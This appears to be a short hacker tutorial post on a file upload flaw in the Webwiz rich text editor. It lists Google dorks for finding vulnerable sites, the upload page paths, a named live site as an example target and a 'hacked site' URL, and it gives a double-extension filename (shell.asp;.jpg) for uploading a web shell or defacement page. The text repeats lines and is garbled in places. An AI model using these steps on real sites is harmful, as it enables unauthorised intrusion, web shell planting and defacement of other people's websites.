Hey guyzz this a very short tutorial , actually its a RTE exploit -file upload vulnerbility of Webwiz websites .
Webwiz rich text editor HTML code is carried in the open after they are sent charCode due functioning of the page .
Webwiz rich text editor HTML code is carried in the open after they are sent charCode due functioning of the page .
>Google Dorks:
these dorks will help you to find vulnerable websites
inurl:rte/my_documents/my_files
inurl:rte/my_documents/my_files
inurl:/my_documents/my_files/
Exploit:
site.com/rte/RTE_popup_file_atch.asp
site.com/admin/RTE_popup_file_atch.asp
http://www.nftmo.com/RTE_popup_file_atch.asp
you can also upload a shell or directly your deface page shell format:- shell.asp;.jpg
Hacked site:
http://www.nftmo.com//my_docum ?ents/my_files/Cyb3r_dev.htm
note: use this at your own risk coz many websites are now olready infected by backdoors.
thnxx for reading it..:)
note: use this at your own risk coz many websites are now olready infected by backdoors.
thnxx for reading it..:)
Website hacking RTE Webwiz Vulnerability | File Upload Vulnerability